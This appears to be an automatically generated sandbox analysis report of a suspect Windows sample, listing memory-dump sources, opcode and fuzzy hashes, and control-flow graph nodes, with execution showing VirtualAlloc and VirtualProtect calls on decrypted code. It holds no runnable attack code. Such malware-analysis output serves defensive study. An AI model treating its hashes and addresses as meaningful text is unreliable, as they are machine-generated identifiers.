                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2189357233.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd9bad0000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 94ba018f4cd19a907138d27162c901e38801a8a3266840c1d667342c4ecfb975
                                                            • Instruction ID: a1579337e21d09d75e9544cde22d6f020fa7a182b38d7db61e8338f6aac6796c
                                                            • Opcode Fuzzy Hash: 94ba018f4cd19a907138d27162c901e38801a8a3266840c1d667342c4ecfb975
                                                            • Instruction Fuzzy Hash: BD41F970E1491D8FDB94EF98C495AEDBBF1FFA8315F11016AE409E32A5DB34A9418B80
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2189357233.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd9bad0000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 868fd24cca17bbafc27c8d09fd18dbda0f767269970ca0126eb08a3d61451cac
                                                            • Instruction ID: 110a45e894db654bdebbd842deb146474ac4a6d4e224da31c07fef8474ff877d
                                                            • Opcode Fuzzy Hash: 868fd24cca17bbafc27c8d09fd18dbda0f767269970ca0126eb08a3d61451cac
                                                            • Instruction Fuzzy Hash: 90310471A0E68E4FE3229BA4CC312FD7B70EF92315F0646B7D055871E2CA782605CB95
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2189357233.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd9bad0000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e09ff128d693b28ecdeb0b31c7e19e43996d5569b46b2c39a2b7046903f91f12
                                                            • Instruction ID: f475ae8c2d23760179604fd9242b69c071d08abc766e80abe80277201f468087
                                                            • Opcode Fuzzy Hash: e09ff128d693b28ecdeb0b31c7e19e43996d5569b46b2c39a2b7046903f91f12
                                                            • Instruction Fuzzy Hash: E831A830A0861C8FDFA9DB54C854BA9B3F5EB64715F1052EA904EF22A4CB756B84CF41
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2189357233.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd9bad0000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 594421b93bcff01351bb3549926af63c198f7f3d14fe721e90564faabf4d13d3
                                                            • Instruction ID: fd1e05b9b4b58b0218966809081288b6465ca77dd70559f28171140827c5652c
                                                            • Opcode Fuzzy Hash: 594421b93bcff01351bb3549926af63c198f7f3d14fe721e90564faabf4d13d3
                                                            • Instruction Fuzzy Hash: D921D13161864ECFDB55EF6CD8559EA77A0FF48318F010276E85DC31A0DB30A664CB82
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2189357233.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd9bad0000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d04a31bad1d38841d680e454b40d7134050f3290e16a0dfbeb78cf503ef4057f
                                                            • Instruction ID: 37e71ce85fea7d762c95570a5dd71c17501ad0cc14149a0bf35829ccd0a620fe
                                                            • Opcode Fuzzy Hash: d04a31bad1d38841d680e454b40d7134050f3290e16a0dfbeb78cf503ef4057f
                                                            • Instruction Fuzzy Hash: 9F31B674D09A2D8EEBA4DB54C8647ECB6B1EB58301F0151E9D40EA22A1DEB96AC4CF04
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2189357233.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd9bad0000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2211fa655e11fee369eb53d1acdd5eec610e03de7bc04414935552b19148266b
                                                            • Instruction ID: cc86c9f660fe0e523944eeec931776c70f15765cbbf60cb2aba4f33708000515
                                                            • Opcode Fuzzy Hash: 2211fa655e11fee369eb53d1acdd5eec610e03de7bc04414935552b19148266b
                                                            • Instruction Fuzzy Hash: 8F31CB74E0962D8EEBA4EF14C8687E8B6F1EB58341F4141E9D40DE62A1DE786BC4CF04
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2189357233.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd9bad0000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 70b9d345aea9e37a472a4f17347ddda521751499fcb40b6f44d277fe37020542
                                                            • Instruction ID: ed5cd68d097567c09a2b742e7f66e0cb21a669275417d960174a21fc8f119415
                                                            • Opcode Fuzzy Hash: 70b9d345aea9e37a472a4f17347ddda521751499fcb40b6f44d277fe37020542
                                                            • Instruction Fuzzy Hash: 06110831B0D68D4EE322A7A4CC312EA7B70EF93311F0646B3D055DB1E2CA781605CB95
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2189357233.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd9bad0000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 24007ab8871cc55d47fb43eb38440fd23c9bba248f44afc0a99b7c3da8ef4b0b
                                                            • Instruction ID: f8c725c34fce945242f14476277e2b3ccdf9d2836e8436682975cebfbd7c312d
                                                            • Opcode Fuzzy Hash: 24007ab8871cc55d47fb43eb38440fd23c9bba248f44afc0a99b7c3da8ef4b0b
                                                            • Instruction Fuzzy Hash: 4D11A331A0D68D4EE322AB64CC352EA7B70EF93311F0646B7D055DB1E2CA781609CB95
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2189357233.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd9bad0000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 41cde79a243e3b7f26b2d49ddb3ae21a139d030094b9017837ad0c2caa537af0
                                                            • Instruction ID: e3140cbebad7c7792b8033b539f25f07912cc3a09847d5df23b8014d5ee62b94
                                                            • Opcode Fuzzy Hash: 41cde79a243e3b7f26b2d49ddb3ae21a139d030094b9017837ad0c2caa537af0
                                                            • Instruction Fuzzy Hash: 45111D70E0962D8EEBB4DB54C8647A8B2F4EB58340F1152F9D50DE2291DEB82B848F04
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2189357233.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd9bad0000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d39d9e241b1998fac164b443f95039c14d3345b9a925db96af5f261e35e2067b
                                                            • Instruction ID: 2fd229e6c704c137a5ae25d736e899f26f1d6e01962093c785894d68ac6982f2
                                                            • Opcode Fuzzy Hash: d39d9e241b1998fac164b443f95039c14d3345b9a925db96af5f261e35e2067b
                                                            • Instruction Fuzzy Hash: 3B110831A0D28D8FE322AB64CC242EA7B70EF83311F0642B7D051DB1F2CA381604CB55
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2189357233.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd9bad0000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2f570a401db46c56a818a654d23e24a0cf32f1d1db6177a4f34a1988f678213f
                                                            • Instruction ID: d89d57fcc4d11948116a0b0bd6a0f72b47ba74ca5b7ba1efe4b4d0b683d3d9dc
                                                            • Opcode Fuzzy Hash: 2f570a401db46c56a818a654d23e24a0cf32f1d1db6177a4f34a1988f678213f
                                                            • Instruction Fuzzy Hash: 1811EA70D0962D8EEBB4DB50C8647ECB2F1EB58341F0152E9C40DA22A1DEB86BC4CF04
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2189357233.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd9bad0000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6371ddffaa6b6cbaf8a479bc9fe4d488454df70bb2bd5dafe193751b7d09bc0b
                                                            • Instruction ID: 91ebe51270005802982c8e4da9618795a40cb5288da7dbe74369a4e0c826a211
                                                            • Opcode Fuzzy Hash: 6371ddffaa6b6cbaf8a479bc9fe4d488454df70bb2bd5dafe193751b7d09bc0b
                                                            • Instruction Fuzzy Hash: 9201D631A0D28D8FE322A764CC342AA7B70EF93305F0642A7D055D71E3CA781604CB55
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2189357233.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd9bad0000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ec989a2d8297febcb9342c26aef7a86120de6e319249ab02e74d8534777295eb
                                                            • Instruction ID: 556ca806bb16223f4f59b9427622a1430ba7403b3e07443edc89acfc30fc1709
                                                            • Opcode Fuzzy Hash: ec989a2d8297febcb9342c26aef7a86120de6e319249ab02e74d8534777295eb
                                                            • Instruction Fuzzy Hash: ECF03030A0564E9FEBA0EF98D4596EE77A0FF94314F114537F41CC21A0DAB46294CB84
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2189357233.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd9bad0000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0d8e7ec7bae53bb1dfbe93fd16878d391cd6eda4676ee76a2ec09c178d95600d
                                                            • Instruction ID: 03aa5ae6f3330171b6aebaeeb704ebc8c0e5497d9697c2360386a34c40c2de18
                                                            • Opcode Fuzzy Hash: 0d8e7ec7bae53bb1dfbe93fd16878d391cd6eda4676ee76a2ec09c178d95600d
                                                            • Instruction Fuzzy Hash: F2F0123091564E9FDB90EFA8C8596EE77E0FF54304F514566F81CD21A0DA70A6A4CB80
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2189357233.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd9bad0000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 37a46e2a384aa077baf2983c8a7bc998b0c90f5ccab626579c352a78ccb57f7d
                                                            • Instruction ID: 7a98f91d8d1e9c4c3c363ac777dbfbb1de92fb0086ef718813767c1af8348104
                                                            • Opcode Fuzzy Hash: 37a46e2a384aa077baf2983c8a7bc998b0c90f5ccab626579c352a78ccb57f7d
                                                            • Instruction Fuzzy Hash: 3AF0B670E0A52D8EEBB4DB54D8647ADB3B0FB94301F1195E9844DA2291CEB85B84CF40
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2189357233.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd9bad0000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: c8fea02b6ae30050f34ef7dbb9d2496a8146291ee4face339af37c253529ba8f
                                                            • Instruction ID: ad064be8f1c79cc623040a9e0cfba2f896195135b00ec5b6977b0cfcfb8bf4d9
                                                            • Opcode Fuzzy Hash: c8fea02b6ae30050f34ef7dbb9d2496a8146291ee4face339af37c253529ba8f
                                                            • Instruction Fuzzy Hash: A841A002B0942605E23A77FD78228F96B44DFA937FB4843B7F45E8D0EB4D196085C2D5

                                                            Execution Graph

                                                            Execution Coverage:4.4%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:6
                                                            Total number of Limit Nodes:0
                                                            execution_graph 18157 7ffd9bad367d 18158 7ffd9bad369f VirtualAlloc 18157->18158 18160 7ffd9bad37b5 18158->18160 18153 7ffd9bad1c8e 18154 7ffd9bad1c9d VirtualProtect 18153->18154 18156 7ffd9bad1ddd 18154->18156

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 17 7ffd9badad3d-7ffd9badad78 18 7ffd9badad7a 17->18 19 7ffd9badad7f-7ffd9badaddf 17->19 18->19 23 7ffd9badade1 19->23 24 7ffd9badaded-7ffd9badadfc 19->24 23->24 25 7ffd9badae03-7ffd9badae0c 24->25 26 7ffd9badadfe 24->26 27 7ffd9badae39-7ffd9badae94 25->27 28 7ffd9badae0e-7ffd9badae1d 25->28 26->25 39 7ffd9badae9b-7ffd9badb10c 27->39 40 7ffd9badae96 27->40 29 7ffd9badae24-7ffd9badc7a5 call 7ffd9badd9c6 28->29 30 7ffd9badae1f 28->30 36 7ffd9badc7b0-7ffd9badc7bb 29->36 30->29 42 7ffd9badc81a-7ffd9badc879 36->42 43 7ffd9badc7bd-7ffd9badc812 36->43 162 7ffd9badb183-7ffd9badb1b3 39->162 163 7ffd9badb10e-7ffd9badb134 39->163 40->39 50 7ffd9badc986-7ffd9badc9de 42->50 51 7ffd9badc87f-7ffd9badc895 42->51 43->42 67 7ffd9badcb75-7ffd9badcc51 50->67 68 7ffd9badc9e4-7ffd9badca07 50->68 56 7ffd9badc90b-7ffd9badc97d 51->56 57 7ffd9badc897-7ffd9badc908 51->57 56->50 83 7ffd9badc97f 56->83 57->56 116 7ffd9badcc57-7ffd9badcc60 67->116 117 7ffd9badcd32-7ffd9badcd85 67->117 76 7ffd9badca09-7ffd9badca2f 68->76 77 7ffd9badca65-7ffd9badcac9 68->77 88 7ffd9badcb5c-7ffd9badcb69 76->88 93 7ffd9badcacb 77->93 94 7ffd9badcad0-7ffd9badcb4a 77->94 83->50 91 7ffd9badca34-7ffd9badca42 88->91 92 7ffd9badcb6f-7ffd9badcb70 88->92 96 7ffd9badca49-7ffd9badca61 91->96 97 7ffd9badca44 91->97 95 7ffd9badcf2d-7ffd9badcf8c 92->95 93->94 126 7ffd9badcb4c-7ffd9badcb51 94->126 127 7ffd9badcb54-7ffd9badcb59 94->127 112 7ffd9badd254-7ffd9badd281 95->112 96->77 97->96 122 7ffd9badd287-7ffd9badd2ab call 7ffd9badda29 112->122 123 7ffd9badcf91-7ffd9badcfcd 112->123 116->117 139 7ffd9badcf1a-7ffd9badcf27 117->139 141 7ffd9badd2b4-7ffd9badd2e8 122->141 142 7ffd9badd2ad 122->142 131 7ffd9badcfea-7ffd9badd251 123->131 132 7ffd9badcfcf-7ffd9badcfe6 123->132 126->127 127->88 131->112 132->131 139->95 143 7ffd9badcd8a-7ffd9badcd98 139->143 149 7ffd9badd2ea-7ffd9badd2f7 141->149 150 7ffd9badd308-7ffd9badd341 141->150 142->141 146 7ffd9badcd9a 143->146 147 7ffd9badcd9f-7ffd9badce3f 143->147 146->147 172 7ffd9badce41-7ffd9badce69 147->172 173 7ffd9badceaf-7ffd9badced7 147->173 152 7ffd9badd2f9 149->152 153 7ffd9badd2fe-7ffd9badd306 149->153 152->153 153->150 170 7ffd9badb1b5-7ffd9badb226 162->170 171 7ffd9badb228-7ffd9badb2a2 162->171 169 7ffd9badbe1e-7ffd9badbe2b 163->169 174 7ffd9badb139-7ffd9badb147 169->174 175 7ffd9badbe31-7ffd9badbe73 169->175 170->171 203 7ffd9badb2a4-7ffd9badb2e9 171->203 204 7ffd9badb2ef-7ffd9badb3a2 171->204 178 7ffd9badce6b 172->178 179 7ffd9badce70-7ffd9badcead 172->179 176 7ffd9badced9 173->176 177 7ffd9badcede-7ffd9badcf07 173->177 181 7ffd9badb149 174->181 182 7ffd9badb14e-7ffd9badb181 174->182 197 7ffd9badbf30-7ffd9badbf36 175->197 176->177 193 7ffd9badcf12-7ffd9badcf17 177->193 178->179 179->193 181->182 182->162 193->139 200 7ffd9badbf3c-7ffd9badbf7e 197->200 201 7ffd9badbe78-7ffd9badbeab 197->201 215 7ffd9badc1cc-7ffd9badc1d2 200->215 214 7ffd9badbeb6-7ffd9badbed5 201->214 203->204 235 7ffd9badb3b1-7ffd9badb45f 204->235 236 7ffd9badb3a4-7ffd9badb3ac 204->236 217 7ffd9badbed7-7ffd9badbedb 214->217 218 7ffd9badbf02-7ffd9badbf2d 214->218 220 7ffd9badc1d8-7ffd9badc231 215->220 221 7ffd9badbf83-7ffd9badc0cb 215->221 217->218 222 7ffd9badbedd-7ffd9badbeff 217->222 218->197 229 7ffd9badc237-7ffd9badc242 220->229 230 7ffd9badc2c0-7ffd9badc317 220->230 271 7ffd9badc0d1-7ffd9badc15b 221->271 272 7ffd9badc15d-7ffd9badc161 221->272 222->218 229->230 249 7ffd9badc777-7ffd9badc77d 230->249 265 7ffd9badb461-7ffd9badb469 235->265 266 7ffd9badb46e-7ffd9badb51c 235->266 239 7ffd9badbe09-7ffd9badbe1b 236->239 239->169 253 7ffd9badc31c-7ffd9badc3ba 249->253 254 7ffd9badc783-7ffd9badc7af call 7ffd9badd9c6 249->254 278 7ffd9badc3ea-7ffd9badc3f9 253->278 279 7ffd9badc3bc-7ffd9badc3df 253->279 254->36 265->239 306 7ffd9badb52b-7ffd9badb5d9 266->306 307 7ffd9badb51e-7ffd9badb526 266->307 285 7ffd9badc1ab-7ffd9badc1c9 271->285 273 7ffd9badc197-7ffd9badc1aa 272->273 274 7ffd9badc163-7ffd9badc195 272->274 273->285 274->285 286 7ffd9badc3fb 278->286 287 7ffd9badc400-7ffd9badc40f 278->287 279->278 285->215 286->287 289 7ffd9badc411-7ffd9badc41f 287->289 290 7ffd9badc424-7ffd9badc43f 287->290 292 7ffd9badc756-7ffd9badc774 289->292 293 7ffd9badc441-7ffd9badc45b 290->293 294 7ffd9badc45f-7ffd9badc74b 290->294 292->249 293->294 294->292 316 7ffd9badb5db-7ffd9badb5e3 306->316 317 7ffd9badb5e8-7ffd9badb696 306->317 307->239 316->239 325 7ffd9badb6a5-7ffd9badb753 317->325 326 7ffd9badb698-7ffd9badb6a0 317->326 334 7ffd9badb755-7ffd9badb75d 325->334 335 7ffd9badb762-7ffd9badb810 325->335 326->239 334->239 343 7ffd9badb812-7ffd9badb81a 335->343 344 7ffd9badb81f-7ffd9badb8cd 335->344 343->239 352 7ffd9badb8dc-7ffd9badb98a 344->352 353 7ffd9badb8cf-7ffd9badb8d7 344->353 361 7ffd9badb999-7ffd9badba47 352->361 362 7ffd9badb98c-7ffd9badb994 352->362 353->239 371 7ffd9badba49-7ffd9badba51 361->371 372 7ffd9badba56-7ffd9badbb04 361->372 362->239 371->239 380 7ffd9badbb06-7ffd9badbb0e 372->380 381 7ffd9badbb13-7ffd9badbb1f 372->381 380->239 381->239
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2188275475.00007FFD9BADA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADA000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bada000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d80912c434298fcb134b1d87cc14bbb198e6606af58c98ac682c7a79da9797ab
                                                            • Instruction ID: eaffc0b43df644e185e8719fff968a7357657a5a7023db6e0e275ca41a0dc374
                                                            • Opcode Fuzzy Hash: d80912c434298fcb134b1d87cc14bbb198e6606af58c98ac682c7a79da9797ab
                                                            • Instruction Fuzzy Hash: 8F130E70E1991D8FDBA8EF58C8A5BA8B7B1FF98310F5042E9D00DD7295DA746A81CF40

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 797 7ffd9bb09a8c 798 7ffd9bb09a91-7ffd9bb09ada 797->798 799 7ffd9bb09ae4-7ffd9bb09aed 798->799 800 7ffd9bb09adc-7ffd9bb09ae1 798->800 801 7ffd9bb09f83-7ffd9bb09f89 799->801 800->799 802 7ffd9bb09f8f-7ffd9bb09fa8 801->802 803 7ffd9bb09af2-7ffd9bb09b1c 801->803 804 7ffd9bb09b1e 803->804 805 7ffd9bb09b23-7ffd9bb09b3c 803->805 804->805 806 7ffd9bb09b3e 805->806 807 7ffd9bb09b43-7ffd9bb09b5d 805->807 806->807 809 7ffd9bb09b5f 807->809 810 7ffd9bb09b64-7ffd9bb09b7c 807->810 809->810 811 7ffd9bb09b7e 810->811 812 7ffd9bb09b83-7ffd9bb09ba4 810->812 811->812 813 7ffd9bb09c12-7ffd9bb09c2f 812->813 814 7ffd9bb09ba6-7ffd9bb09baa 812->814 815 7ffd9bb09c31 813->815 816 7ffd9bb09c36-7ffd9bb09c4f 813->816 814->813 817 7ffd9bb09bac-7ffd9bb09bc0 814->817 815->816 818 7ffd9bb09c51 816->818 819 7ffd9bb09c56-7ffd9bb09c70 816->819 820 7ffd9bb09c04-7ffd9bb09c0a 817->820 818->819 823 7ffd9bb09c72 819->823 824 7ffd9bb09c77-7ffd9bb09c8f 819->824 821 7ffd9bb09bc2-7ffd9bb09bc6 820->821 822 7ffd9bb09c0c-7ffd9bb09c0d 820->822 825 7ffd9bb09bd1-7ffd9bb09be7 821->825 826 7ffd9bb09bc8-7ffd9bb09bce 821->826 829 7ffd9bb09ca3-7ffd9bb09d89 822->829 823->824 827 7ffd9bb09c91 824->827 828 7ffd9bb09c96-7ffd9bb09ca0 824->828 830 7ffd9bb09bee-7ffd9bb09c01 825->830 831 7ffd9bb09be9 825->831 826->825 827->828 828->829 832 7ffd9bb09d93-7ffd9bb09e45 829->832 833 7ffd9bb09d8b-7ffd9bb09d90 829->833 830->820 831->830 834 7ffd9bb09e9e-7ffd9bb09ea2 832->834 835 7ffd9bb09e47-7ffd9bb09e60 832->835 833->832 838 7ffd9bb09ea4 834->838 839 7ffd9bb09ea9-7ffd9bb09ec2 834->839 836 7ffd9bb09e62-7ffd9bb09e66 835->836 837 7ffd9bb09ed3-7ffd9bb09eea 835->837 836->837 843 7ffd9bb09e68-7ffd9bb09e77 836->843 841 7ffd9bb09ef1-7ffd9bb09f0b 837->841 842 7ffd9bb09eec 837->842 838->839 840 7ffd9bb09ec5-7ffd9bb09ecb 839->840 844 7ffd9bb09ecd-7ffd9bb09ece 840->844 845 7ffd9bb09e79-7ffd9bb09e7d 840->845 846 7ffd9bb09f0d 841->846 847 7ffd9bb09f12-7ffd9bb09f36 841->847 842->841 843->840 848 7ffd9bb09f7b-7ffd9bb09f80 844->848 851 7ffd9bb09e7f-7ffd9bb09e8e 845->851 852 7ffd9bb09e91-7ffd9bb09e98 845->852 846->847 849 7ffd9bb09f3d-7ffd9bb09f61 847->849 850 7ffd9bb09f38 847->850 848->801 853 7ffd9bb09f63 849->853 854 7ffd9bb09f68-7ffd9bb09f79 849->854 850->849 851->852 852->834 853->854 854->848
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2188275475.00007FFD9BB09000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB09000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bb09000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 856d808c7b1ff8c5066bfb2ca50477f331089f1235b3e884ddea6a1d270bf1b3
                                                            • Instruction ID: 5cf61e3f1b27680cccc9ce9f7698501e70c6514e77e884b84bcc4140f18fbd9a
                                                            • Opcode Fuzzy Hash: 856d808c7b1ff8c5066bfb2ca50477f331089f1235b3e884ddea6a1d270bf1b3
                                                            • Instruction Fuzzy Hash: 6C12F470E0421D8FDB18CFA8C495AECBBF2FF48304F148569D45AEB29ADA34A945CF50

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 855 7ffd9bac0da3-7ffd9bac0db7 856 7ffd9bac0dba-7ffd9bac0df9 855->856 857 7ffd9bac0db9 855->857 859 7ffd9bac0dfb 856->859 860 7ffd9bac0e00-7ffd9bac0eb7 call 7ffd9bac07d0 856->860 857->856 859->860 873 7ffd9bac0eb9-7ffd9bac0ece 860->873 874 7ffd9bac0ecf-7ffd9bac0fa8 860->874 873->874 887 7ffd9bac0faa-7ffd9bac0fbe 874->887 888 7ffd9bac0fc0-7ffd9bac0fe3 874->888 887->888 891 7ffd9bac0feb-7ffd9bac10dc 888->891
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2188275475.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bac0000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 094041faf89b47ba8849169e8a21811d21d719c97607624241549468238461da
                                                            • Instruction ID: e2186fd997528d8cc48caed7dc5bdc10cef730a1429f95697b6d23488eec6621
                                                            • Opcode Fuzzy Hash: 094041faf89b47ba8849169e8a21811d21d719c97607624241549468238461da
                                                            • Instruction Fuzzy Hash: 32A1C171A19A4D8FE7A8EF6CC8657A97BE1FF55314F0002BEE049D72E6CA781941C740

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 383 7ffd9bad1c8e-7ffd9bad1c9b 384 7ffd9bad1ca6-7ffd9bad1cb7 383->384 385 7ffd9bad1c9d-7ffd9bad1ca5 383->385 386 7ffd9bad1cb9-7ffd9bad1cc1 384->386 387 7ffd9bad1cc2-7ffd9bad1ddb VirtualProtect 384->387 385->384 386->387 391 7ffd9bad1de3-7ffd9bad1e33 387->391 392 7ffd9bad1ddd 387->392 392->391
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2188275475.00007FFD9BACA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACA000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9baca000_nGnJvqnFLoRdIZNyVoMyF.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 30c38c8afa9d2393d127744b3e9607556b295ea1cca14408fde9820181c3ae07
                                                            • Instruction ID: e0ceca59687e29b2a23946b1458780d41c7dff60d1499514f1786ebe5b8554fa
                                                            • Opcode Fuzzy Hash: 30c38c8afa9d2393d127744b3e9607556b295ea1cca14408fde9820181c3ae07
                                                            • Instruction Fuzzy Hash: AE517D30D0864D8FDB54DFA8C845AEDBBF1FB6A310F1042AAD049E3252DB74A885CB81

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 395 7ffd9bad367d-7ffd9bad37b3 VirtualAlloc 400 7ffd9bad37bb-7ffd9bad381f 395->400 401 7ffd9bad37b5 395->401 401->400
                                                            APIs
                                                            Memory Dump Source
